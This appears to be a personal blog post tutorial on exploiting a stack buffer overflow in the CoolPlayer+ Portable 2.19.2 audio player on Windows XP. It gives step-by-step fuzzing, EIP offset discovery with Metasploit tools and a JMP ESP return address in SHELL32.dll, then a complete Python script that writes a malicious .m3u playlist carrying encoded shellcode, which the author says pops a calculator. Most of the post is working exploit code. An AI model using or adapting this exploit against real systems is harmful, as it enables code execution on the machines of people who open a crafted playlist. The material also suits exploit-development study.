Posted by shinigami at 12:54
Read our previous post
Today I learn buffer overflow CoolPlayer+ Portable 2.19.2. This is a Audio Player for windows. I need to prepare some tools for exploitation.- Windows XP SP 3 English
- Ollydbg
- Metasploit
- Geany text editor
#!C:\Python27\python.exeRun the fuzzer, open the playlist using Cool Player and look at the EIP. The EIP was overwriten.
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
# How to use
# fuzzer.py playme.m3u "\x41" 1000
import sys
filename = sys.argv[1]
my_args = sys.argv[2]
long_args= int(sys.argv[3])
sploit = my_args * long_args
fopen = open(filename,'w')
fopen.write(sploit)
After making EIP overwrite, I need to know where the EIP overwriten exactly.
Use metasploit pattern_create to check it,
./pattern_create.rb 1000
edit the fuzzer
#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
filename = "playme.m3u"
junk = ".....pattern_create......"
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)
Now, re-run the fuzzer. Reopen the ollydbg and attach the Coolplayer. Load the playme.m3u again.
Look at the EIP, copy the value and check using pattern_offset of metasploit tools
./pattern_offset.rb 30684139and return value 209. Now back into fuzzer and edit look like this :
#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp #
## http://is2c-dojo.com #
## http://scx020c07c.blogspot.com #
########################################
filename = "playme.m3u"
junk = "\x90" * 209
junk += "\xEF\xBE\xAD\xDE"
junk += "\x41" * (1000-len(junk))
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)
Run the fuzzer, restart Olly and Coolplayer. Then load playme.m3u again. Make sure that the EIP was overwritten with DEADBEEF.
Then we need module that having opcode JMP ESP.
Click View->Executable Module, double click SHELL32.dll. Search the JMP ESP, Click right->Search For->Command, insert JMP ESP. Please note the address of JMP ESP.
Back into CPU right block, Click in the ESP and Right click Follow in Dump.
Generate payload using metasploit and the bad characters is 00,0a,0d
Edit the fuzzer again :
#!C:\Python27\python.exe
junk = "\x90" * 209
junk += "\xD7\x30\x9D\x7C" # JMP ESP
junk += "\x90" * 16
junk += ("\xba\x90\x6e\xa9\x03\xdb\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x32\x83\xc3\x04\x31\x53\x0e\x03\xc3\x60\x4b\xf6\x1f\x94\x02"
"\xf9\xdf\x65\x75\x73\x3a\x54\xa7\xe7\x4f\xc5\x77\x63\x1d\xe6"
"\xfc\x21\xb5\x7d\x70\xee\xba\x36\x3f\xc8\xf5\xc7\xf1\xd4\x59"
"\x0b\x93\xa8\xa3\x58\x73\x90\x6c\xad\x72\xd5\x90\x5e\x26\x8e"
"\xdf\xcd\xd7\xbb\x9d\xcd\xd6\x6b\xaa\x6e\xa1\x0e\x6c\x1a\x1b"
"\x10\xbc\xb3\x10\x5a\x24\xbf\x7f\x7b\x55\x6c\x9c\x47\x1c\x19"
"\x57\x33\x9f\xcb\xa9\xbc\xae\x33\x65\x83\x1f\xbe\x77\xc3\xa7"
"\x21\x02\x3f\xd4\xdc\x15\x84\xa7\x3a\x93\x19\x0f\xc8\x03\xfa"
"\xae\x1d\xd5\x89\xbc\xea\x91\xd6\xa0\xed\x76\x6d\xdc\x66\x79"
"\xa2\x55\x3c\x5e\x66\x3e\xe6\xff\x3f\x9a\x49\xff\x20\x42\x35"
"\xa5\x2b\x60\x22\xdf\x71\xee\xb5\x6d\x0c\x57\xb5\x6d\x0f\xf7"
"\xde\x5c\x84\x98\x99\x60\x4f\xdd\x56\x2b\xd2\x77\xff\xf2\x86"
"\xca\x62\x05\x7d\x08\x9b\x86\x74\xf0\x58\x96\xfc\xf5\x25\x10"
"\xec\x87\x36\xf5\x12\x34\x36\xdc\x70\xdb\xa4\xbc\x76")
sploit = junk
fopen = open("playme.m3u",'w')
fopen.write(sploit)
fopen.close()
Rerun the fuzzer, open coolplayer and load the playme.m3u again. Look the Coolplayer was crash and calculator appear.
No comments:
Post a Comment